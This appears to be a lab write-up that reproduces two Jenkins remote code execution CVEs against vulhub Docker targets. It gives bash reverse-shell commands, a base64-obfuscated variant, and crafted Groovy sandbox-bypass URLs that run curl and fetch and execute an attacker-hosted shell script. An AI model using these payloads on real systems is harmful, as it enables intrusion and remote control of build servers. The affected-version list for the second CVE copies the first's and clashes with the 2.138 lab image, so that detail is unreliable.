Jenkins RCE vulnerability recurrence (CVE-2017-1000353, CVE-2018-1000861)

Jenkins RCE vulnerability recurrence (CVE-2017-1000353, CVE-2018-1000861)

I. Introduction

Jenkins is a commonly used continuous build tool in the software testing process. There are roughly two ways to trigger Jenkins RCE vulnerabilities, one is triggered using the Jenkins CLI, and the other is triggered by an HTTP request. CVE-2017-1000353 and CVE-2018-1000861 reproduced here are representatives of the two triggering methods.

2. Introduction to Jenkins

Jenkins is a visual web tool widely used for continuous construction. It is the "automated" compilation, packaging, distribution and deployment of various projects. It will previously compile, package, upload and deploy to the corresponding middleware (such as: tomcat) The process is handed over to Jenkins, which pulls the code to the Jenkins host through the given code address, compiles, packages and publishes it to the web container. Jenkins can support multiple languages ​​​​(such as: java, c#, php, etc.), and is also compatible with a variety of third-party build tools such as ant, maven, gradle, etc., and is seamlessly integrated with the mainstream version control tools git and svn on the market. Supports direct integration with github.

2.1 Jenkins CLI

Jenkins CLI is Jenkins' built-in command line interface for users and administrators to access Jenkins from a script or shell environment. It is convenient for users to write scripts for some daily tasks, and batch updates, troubleshooting, etc. are also very convenient.

3. Jenkins-CI remote code execution vulnerability (CVE-2017-1000353)

3.1 Vulnerability Overview

​ CVE-2017-1000353 is an unauthorized remote code execution vulnerability in Jenkins that allows an attacker to transfer a serialized Java SignedObject object to the Jenkins CLI for processing and deserialize an ObjectInputStream as a Command object, which will bypass the blacklist-based protection mechanism. Causes code execution.

Affected versions:

​ Jenkins Version <=2.56

​ Jenkins LTS Version <= 2.46.1

3.2 Vulnerability recurrence

3.2.1 Vulnerability environment

Attack machine: kali (ip: 192.168.219.134)

Attacked host: docker environment deployment (ip: 192.168.219.128)

Vulnerability environment: vulhub/jenkins:2.46.1

Building process:

​ 1. Download the vulhub shooting range file (https://github.com/vulhub/vulhub)

2. After decompression, switch to the specified directory and use the docker-compose command to pull the docker environment and create the container.

cd vulhub-master/jenkins/CVE-2017-1000353
docker-compose up -d

3. Open TCP port 8080 on the firewall, and then access port 8080 to check whether the deployment is successful.

3.2.2 Reproduction process

Exploit tools:

CVE-2017-1000353-SNAPSHOT-all.jar（ https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar）

exploit.py （https://github.com/vulhub/CVE-2017-1000353/blob/master/exploit.py）

Reproduction steps:

1. Use CVE-2017-1000353-SNAPSHOT-all.jar to generate the bytecode file jenkins_poc.ser that executes the rebound shell command.

   # 使用bash反弹shell，端口为攻击机的4444。
   bash -i >& /dev/tcp/192.168.219.134/4444 0>&1
   # 将上述反弹shell命令base64编码，结果如：YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxOS4xMzQvNDQ0NCAwPiYx
   #使用 bash -c 执行编码后的命令
   bash -c {
         
         echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxOS4xMzQvNDQ0NCAwPiYx}|{
         
         base64,-d}|{
         
         bash,-i}
   

   The final command to generate the ser file is as follows:

   java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxOS4xMzQvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}"
   

   Note: If the Java version is too high, the following errors may occur. It is recommended to use jdk 1.8 for compilation.

   

2. Use " nc -lvp 4444 " on kali to listen to port 4444.

3. Use exploit.py to send jenkins_poc.ser to Jenkins.

   python exploit.py http://192.168.219.128:8080 jenkins_poc.ser
   

   

4. The exploit is successful and the shell is returned successfully.

3.3 Repair suggestions

1. Upgrade Jenkins to the latest version or apply relevant patches.
2. Do not put the Jenkins service on the public network for use, or only allow access from some IPs.

4. Jenkins remote command execution vulnerability (CVE-2018-1000861)

4.1 Vulnerability Overview

Jenkins is developed using the Stapler framework, which allows users to call a public method through the URL PATH. Since there are no restrictions on this process, attackers can construct some special PATHs to execute some sensitive Java methods.

Affected versions:

​ Jenkins Version <= 2.56

​ Jenkins LTS Version <= 2.46.1

4.2 Vulnerability recurrence

4.2.1 Vulnerability environment

Attack machine: kali (ip: 192.168.219.134)

Attacked host: docker environment deployment (ip: 192.168.219.128)

Vulnerability environment: vulhub/jenkins:2.138

Building process:

​ 1. Download the vulhub shooting range file (https://github.com/vulhub/vulhub)

2. After decompression, switch to the specified directory and use the docker-compose command to pull the docker environment and create the container.

cd vulhub-master/jenkins/CVE-2018-1000861
docker-compose up -d

3. Open TCP port 8080 on the firewall, and then access port 8080 to check whether the deployment is successful.

4.2.2 Reproduction process

1. Apply for a DNSLog subdomain name (http://www.dnslog.cn/), for example: ma3b93.dnslog.cn

2. Use the POC to execute the curl command to access the above subdomain name.

   The curl command is as follows:

   curl http://ma3b93.dnslog.cn/
   

   The final POC is as follows

   http://192.168.219.128:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"curl http://ma3b93.dnslog.cn/".execute()}}
   

   After modifying it according to the specific reproduction environment, use the browser to access the above url.

   

3. Check the domain name query record in DNSLog. If there is a corresponding record, it means that this Jenkins contains a vulnerability and the curl command was executed.

   

4. Use the method of downloading files to rebound the shell

• Create shell.sh on kali with the following content:

bash -i >& /dev/tcp/192.168.219.134/4444 0>&1 

• Use "python -m SimpleHTTPServer" in the directory where shell.sh is located to start the http service

• Use the following POC, execute the curl command to download shell.sh on kali and save it as 1.sh under tmp.

http://192.168.219.128:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"curl -o /tmp/1.sh http://192.168.219.134:8000/shell.sh".execute()}}

• Use " nc -lvp 4444 " on kali to listen to port 4444.

• Use the following POC and execute 1.sh under tmp.

http://192.168.219.128:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"bash /tmp/1.sh".execute()}}

5. The exploit is successful and the shell is returned successfully.

4.3 Repair suggestions

1. Upgrade Jenkins to the latest version or apply relevant patches.
2. Do not put the Jenkins service on the public network for use, or only allow access from some IPs.

5. Reference articles

1. Jenkins vulnerability analysis (https://cloud.tencent.com/developer/article/1670480).
2. Jenkins remote command execution vulnerability (CVE-2018-1000861) (https://vulhub.org/#/environments/jenkins/CVE-2018-1000861/).
3. Jenkins-CI remote code execution vulnerability (CVE-2017-1000353) (https://vulhub.org/#/environments/jenkins/CVE-2017-1000353/).
4. Jenkins remote command execution vulnerability (CVE-2018-1000861) (https://vulhub.org/#/environments/jenkins/CVE-2018-1000861/).
5. Jenkins-CI remote code execution vulnerability (CVE-2017-1000353) (https://vulhub.org/#/environments/jenkins/CVE-2017-1000353/).